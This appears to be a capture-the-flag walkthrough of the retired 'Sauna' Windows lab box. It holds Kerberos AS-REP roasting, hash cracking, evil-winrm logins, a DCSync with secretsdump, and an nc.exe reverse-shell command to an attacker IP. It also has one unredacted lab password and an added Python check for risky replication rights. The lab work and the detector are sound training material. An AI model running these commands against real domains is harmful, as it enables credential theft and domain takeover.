Sauna

Windows - Easy - Retired

- ASREPRoast

Names: Fergus Smith, Shaun Coins, Hugo Bear, Bowie Taylor, Sophie Driver, Steven Kerb, Jenny Joy, James Doe

kerbrute userenum --dc sauna.htb -d EGOTISTICALBANK --safe -v usernames

[+] VALID USERNAME: fsmith@EGOTISTICALBANK

- AS-REP Hash

impacket-GetNPUsers -dc-ip sauna.htb -format hashcat -usersfile kerbuser -outputfile fsmith.asreproast EGOTISTICALBANK/

hashcat -a 0 -m 18200 --force fsmith.asreproast /usr/share/wordlists/rockyou.txt

Password = [redacted]

- WINRM [5986]

evil-winrm -u 'fsmith' -p 'Thestrokes23' -i sauna.htb

$env:COMPUTERNAME

→ Some AutoLogon credentials were found

DefaultDomainName : EGOTISTICALBANK

DefaultUserName : EGOTISTICALBANK\svc_loanmanager

DefaultPassword : [redacted]

Note: This powershell script doesn't work. [Maybe try again sometime]

 $user='svc_loanmanager'
 $password='[redacted]'
 $securePassword= ConvertTo-SecureString $password -AsPlainText -Force
 $credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
 Start-Process -FilePath 'nc.exe' -ArgumentList '-e cmd.exe 10.10.14.30 7908' -Credential $credential

evil-winrm -u 'svc_loanmgr' -p '[redacted]' -i sauna.htb

bloodhound-python -u svc_loanmgr -p [redacted] -d EGOTISTICALBANK.LOCAL -ns 10.10.10.175 -c All

- DCSync Attack

Some very privileged rights are required to execute a DCSync attack. Since it typically takes some time for an attacker to obtain these permissions, this attack is classified as a late-stage kill chain attack.

Generally, Administrators, Domain Admins and Enterprise Admins have the rights required to execute a DCSync attack. Specifically, the following rights are required:

* Replicating Directory Changes
* Replicating Directory Changes All
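
An added defensive example (not part of the original notes): given the SDDL string of the domain root's security descriptor, it lists trustees outside an expected set that hold both rights named above. The expected-alias set, the function names and the sample SIDs are assumptions; hex-encoded rights masks and conditional ACEs are not handled.

```python
import re

# Control-access-right GUIDs for the two rights listed above.
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # Replicating Directory Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # Replicating Directory Changes All
BOTH = {GET_CHANGES, GET_CHANGES_ALL}

# Assumption: SDDL aliases expected to hold these rights; adjust per environment.
EXPECTED = {"BA", "DA", "EA", "ED", "DD", "RO", "SY"}

def pairs(s):
    """Split an SDDL flag or rights string into its two-letter codes."""
    return {s[i:i + 2] for i in range(0, len(s), 2)}

def replication_rights(sddl):
    """Return {trustee: replication rights granted by allow ACEs in the DACL}."""
    dacl = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    granted = {}
    for ace in re.findall(r"\(([^()]*)\)", dacl.group(1) if dacl else ""):
        fields = ace.split(";")
        if len(fields) != 6:
            continue  # conditional ACEs carry a 7th field; not handled here
        ace_type, flags, rights, obj, _inherit_obj, trustee = fields
        if ace_type not in ("A", "OA") or "IO" in pairs(flags):
            continue  # deny and inherit-only ACEs grant nothing on this object
        codes = pairs(rights)
        if "GA" in codes or ("CR" in codes and not obj):
            got = set(BOTH)  # full control, or all extended rights
        elif "CR" in codes and obj.lower() in BOTH:
            got = {obj.lower()}
        else:
            continue
        granted.setdefault(trustee, set()).update(got)
    return granted

def dcsync_capable(sddl, expected=EXPECTED):
    """Trustees outside the expected set that hold both replication rights."""
    return sorted(t for t, r in replication_rights(sddl).items()
                  if r == BOTH and t not in expected)

# Constructed sample DACL; the two S-1-5-21-... SIDs are made up.
SVC = "S-1-5-21-1111111111-2222222222-3333333333-1108"
HALF = "S-1-5-21-1111111111-2222222222-3333333333-1109"
SAMPLE = ("O:DAG:DAD:AI"
          f"(OA;;CR;{GET_CHANGES};;BA)(OA;;CR;{GET_CHANGES_ALL};;BA)"
          f"(OA;;CR;{GET_CHANGES};;ED)(OA;;CR;{GET_CHANGES_ALL};;DD)"
          f"(OA;;CR;{GET_CHANGES};;{SVC})(OA;;CR;{GET_CHANGES_ALL};;{SVC})"
          f"(OA;;CR;{GET_CHANGES};;{HALF})(A;CI;GA;;;EA)(A;;RPLCRC;;;AU)")
print(dcsync_capable(SAMPLE))
```

Only the trustee holding both rights is reported; the one with Replicating Directory Changes alone is not, and the `RPLCRC` mask is not mistaken for `CR` because rights are read as two-letter codes.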

impacket-secretsdump 'EGOTISTICALBANK/svc_loanmgr:[redacted]@10.10.10.175'

- Cracking Administrator password

hashcat -a 0 '[redacted]' /usr/share/wordlists/rockyou.txt

- Using WINRM for shell

evil-winrm -u 'administrator' -H '' -i 10.10.10.175
